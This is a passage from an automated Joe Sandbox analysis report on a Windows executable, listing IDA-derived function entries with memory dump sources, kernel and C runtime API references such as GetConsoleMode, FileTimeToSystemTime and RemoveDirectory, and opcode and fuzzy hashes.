                                                                                                                                                             • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmp
                                                                                                                                                             • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastMessageModuleName
                                                                                                                                                            • String ID: Failed to convert executable path to UTF-8.$Failed to get executable path.$GetModuleFileNameW
                                                                                                                                                            • API String ID: 2581892565-1977442011
                                                                                                                                                            APIs
                                                                                                                                                            • GetConsoleMode.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6D6EADCFB), ref: 00007FF6D6EADE2C
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,?,?,00000000,00000000,00007FF6D6EADCFB), ref: 00007FF6D6EADEB7
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleErrorLastMode
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 953036326-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _get_daylight$_isindst
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 4170891091-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CloseCreateFileHandle_invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1279662727-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3251591375-0
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Process$CurrentExitTerminate
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1703294689-0
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CreateDirectoryMessage
                                                                                                                                                            • String ID: Security descriptor is not initialized!
                                                                                                                                                            • API String ID: 73271072-986317556
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            APIs
                                                                                                                                                            • FindCloseChangeNotification.KERNELBASE(?,?,?,00007FF6D6EAB78D,?,?,00000000,00007FF6D6EAB842), ref: 00007FF6D6EAB97E
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6D6EAB78D,?,?,00000000,00007FF6D6EAB842), ref: 00007FF6D6EAB988
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ChangeCloseErrorFindLastNotification
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1687624791-0
                                                                                                                                                            • Opcode ID: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                                                                                                                            • Instruction ID: 2af29498a4700036723d61b3cc18798b875780d614cb05d79f93530ba5eef433
                                                                                                                                                            • Opcode Fuzzy Hash: 3fd0f83af0628cda6e58ba1b17cfc613668cd8d43ebee099ac9aff2e4f27651a
                                                                                                                                                            • Instruction Fuzzy Hash: 4721D851F0C68241FE945765959067D12E16F94BA4F04433BDA6EC73C6CF6EE4748300
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorFileLastPointer
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2976181284-0
                                                                                                                                                            • Opcode ID: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                                                                                                                            • Instruction ID: 03a519b75075920e4827f4ff4f5a5125d7a4f79e3f498ba37a7a681d938a61d8
                                                                                                                                                            • Opcode Fuzzy Hash: 5a688e03e61d2ba522e05303caa220c229835d3c67e189c94220df843fa187e3
                                                                                                                                                            • Instruction Fuzzy Hash: 43119165B1CB8181DA208B29A40416D73A1BB85FF4F684336EE7D8B7E9CF7DD0648740
                                                                                                                                                            APIs
                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6EA875D), ref: 00007FF6D6EA8903
                                                                                                                                                            • SystemTimeToTzSpecificLocalTime.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF6D6EA875D), ref: 00007FF6D6EA8919
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Time$System$FileLocalSpecific
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1707611234-0
                                                                                                                                                            • Opcode ID: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
                                                                                                                                                            • Instruction ID: ac757873a88d15e5b51e7d94ea35a7c4b7e47e007a5ec2a68af27be53572b689
                                                                                                                                                            • Opcode Fuzzy Hash: f486ed6e5c3c2cbaa4962bae20fc4c636bf07173bccdb3ad29f0a9c75d11b156
                                                                                                                                                            • Instruction Fuzzy Hash: 58015E2290C65282E7649B14E40163FB7B1FB85B65F604237E6AD819D8DF7ED424DB00
                                                                                                                                                            APIs
                                                                                                                                                            • RtlRestoreThreadPreferredUILanguages.NTDLL(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB716
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6D6EB3B72,?,?,?,00007FF6D6EB3BAF,?,?,00000000,00007FF6D6EB4075,?,?,00000000,00007FF6D6EB3FA7), ref: 00007FF6D6EAB720
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ErrorLanguagesLastPreferredRestoreThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 588628887-0
                                                                                                                                                            • Opcode ID: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
                                                                                                                                                            • Instruction ID: ea5f59e5fe426ec9f266f4cf3d3ee6f0b638b26f2e056adbb8be70733225fbbc
                                                                                                                                                            • Opcode Fuzzy Hash: c0904582055235206b637bb6fb630becad907d152bf6a94a3ba36ee294329771
                                                                                                                                                            • Instruction Fuzzy Hash: C2E0C260F0D30242FF18ABF2989883C12714F88B50F444136ED0DCB391EF2EA8B5C290
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DeleteErrorFileLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2018770650-0
                                                                                                                                                            • Opcode ID: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
                                                                                                                                                            • Instruction ID: e7acef23ed89e2d880ffa4aae5db688bc67929b7e33975fa98123bcf44b0baf7
                                                                                                                                                            • Opcode Fuzzy Hash: b1319888d58344e1d146038dbe51c945b0a95c66f9246088a0a26429922302e0
                                                                                                                                                            • Instruction Fuzzy Hash: DDD01214F2C603D1E61437B50C8543D11A42F45B20F500B32D02DC11D0EF1EA1B55151
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 377330604-0
                                                                                                                                                            • Opcode ID: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
                                                                                                                                                            • Instruction ID: 531a1279baf696a2d23264050cc87637af1c04023b3f95d7722d8e26e3a72535
                                                                                                                                                            • Opcode Fuzzy Hash: 37b4a7e4d00d01a0eafeac234b577e395ecf372998b901b949fd5718f631df3e
                                                                                                                                                            • Instruction Fuzzy Hash: 03D01250F3D64385F61837B91C4583D11B06FC4B31F500A72D01DC12D0EF6EA175A512
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6D6E98DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6D6E92A9B), ref: 00007FF6D6E98E1A
                                                                                                                                                            • _findclose.LIBCMT ref: 00007FF6D6E981A9
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ByteCharMultiWide_findclose
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2772937645-0
                                                                                                                                                            • Opcode ID: 5c090acf361251766d305cac3795a7fd92be8d5984d8a4884605395e16dcc53a
                                                                                                                                                            • Instruction ID: b6496b512900ebccd4b9f42b333cb235d64e78686459025ebedaefcacef614ee
                                                                                                                                                            • Opcode Fuzzy Hash: 5c090acf361251766d305cac3795a7fd92be8d5984d8a4884605395e16dcc53a
                                                                                                                                                            • Instruction Fuzzy Hash: C2717F52E1CBC581E611CB2CD5052FD6360FBA9B4CF55E322DB9C525A2EF29E2E9C700
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                                                                                                                            • Instruction ID: 92dedb387146e4880d480692404905750d2861029bbbd0296fee52c9aeb69e1b
                                                                                                                                                            • Opcode Fuzzy Hash: 23588c1d4a76148e9b0b46970dab15bc80394bd809d2a1daf00a983cf625f788
                                                                                                                                                            • Instruction Fuzzy Hash: 4241B032D1D24187EA64DB29A540A7D77B0EB56B80F141233D68EC7691CF2EE422DB51
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 377330604-0
                                                                                                                                                            • Opcode ID: 9b68c8e0b8cd10c838e6d7f4f4b55f470fe5ed83debbdf123e575bf7c203fc29
                                                                                                                                                            • Instruction ID: fbbf7eb8469993d9dd1f0098333b0e59ac4e0cac8e1f8b76ae2c4b49cc640503
                                                                                                                                                            • Opcode Fuzzy Hash: 9b68c8e0b8cd10c838e6d7f4f4b55f470fe5ed83debbdf123e575bf7c203fc29
                                                                                                                                                            • Instruction Fuzzy Hash: 95419516E1C78581E7119B24D5112FE6360FFA5748F54A637DF8DC21A3EF29A5E8C310
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _fread_nolock
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 840049012-0
                                                                                                                                                            • Opcode ID: a473023860c9e70523f1a6084cd67f1de6e845109c1389548bff5c30ff15c96b
                                                                                                                                                            • Instruction ID: 685f39c6ae1b72cf0c12889d0647298d66e4d0f444b3cf981ed45a1aa0d609a6
                                                                                                                                                            • Opcode Fuzzy Hash: a473023860c9e70523f1a6084cd67f1de6e845109c1389548bff5c30ff15c96b
                                                                                                                                                            • Instruction Fuzzy Hash: D7218021F0D69286FB509B1269047FFA651BF45BD8F884833EE0E87796DE3EE465C600
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 6f129a51ddc40ccd340bbb8f7c4a6b0a77a886fd9940d8bf9f35834e1e9c90b2
                                                                                                                                                            • Instruction ID: 61608251ce2e8e1e49c1f0010b6d672587e6fa58b3a5b31af8f1a262681ead28
                                                                                                                                                            • Opcode Fuzzy Hash: 6f129a51ddc40ccd340bbb8f7c4a6b0a77a886fd9940d8bf9f35834e1e9c90b2
                                                                                                                                                            • Instruction Fuzzy Hash: 5F31C232E1C64285F711AB658881B7C2670AF84FA1F510237EA1DCB3D2CF7EE8619791
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3947729631-0
                                                                                                                                                            • Opcode ID: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                                                                                                                            • Instruction ID: 133ec2b65bd704d79ba9fff0253a1e403bef7a34a0aa3b07ff4ee8ab745b0063
                                                                                                                                                            • Opcode Fuzzy Hash: 9c0127de50016242ddc74074b6af7f5d0c7ecdfc40d630aae62ff1a96a90ed2f
                                                                                                                                                            • Instruction Fuzzy Hash: 74218136E08B0589EB258F69C484AFD37B0EB44718F440636E61D86AD9EF39D4A5CB80
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                                                                                                                            • Instruction ID: daa554d094ff017eb726764057cf27f08b5c2d355c5bf73e668275b9056b3232
                                                                                                                                                            • Opcode Fuzzy Hash: a12511eb413a20500788068782fa49ddb1fe92b02a1e7189881bce5d81ea64e9
                                                                                                                                                            • Instruction Fuzzy Hash: 32117521E1D68181EA609F519510A7DA3B0BF86B84F544033EB8CD7B96CF3EE5208741
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000004.00000002.2227293045.00007FF6D6E91000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6D6E90000, based on PE: true
                                                                                                                                                            • Associated: 00000004.00000002.2227261770.00007FF6D6E90000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227332229.00007FF6D6EBC000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ECF000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227390571.00007FF6D6ED1000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            • Associated: 00000004.00000002.2227467707.00007FF6D6ED3000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_4_2_7ff6d6e90000_main.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _invalid_parameter_noinfo
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 3215553584-0
                                                                                                                                                            • Opcode ID: 14b88cdde8f100e0c11df9c25968cfa6048feb9caeb9ba24198eb79990a08c61
